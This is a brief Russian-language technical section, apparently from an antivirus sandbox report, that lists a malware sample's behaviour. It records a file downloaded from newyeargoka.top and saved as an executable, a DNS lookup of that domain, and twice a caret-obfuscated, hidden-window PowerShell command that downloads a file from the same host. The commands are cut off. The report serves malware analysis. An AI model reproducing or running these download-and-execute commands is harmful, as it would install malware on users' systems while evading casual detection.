Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^wE^RSH^elL^.ex^e^ -^eXEc^U^Tion^po^LI^c^Y ^b^YPasS -No^PRoFIl^e ^-WI^N^DoWsT^YLe HID^D^en (^n^E^w^-oBjec^T SySTe^M^.nEt.WeBC^LiENT).^D^OWn^LOA^dfILE('http://newyeargoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "P^o^wE^RSH^elL^.ex^e^ -^eXEc^U^Tion^po^LI^c^Y ^b^YPasS -No^PRoFIl^e ^-WI^N^DoWsT^YLe HID^D^en (^n^E^w^-oBjec^T SySTe^M^.nEt.WeBC^LiENT).^D^OWn^LOA^dfILE('http://newyeargoka....' (со скрытым окном)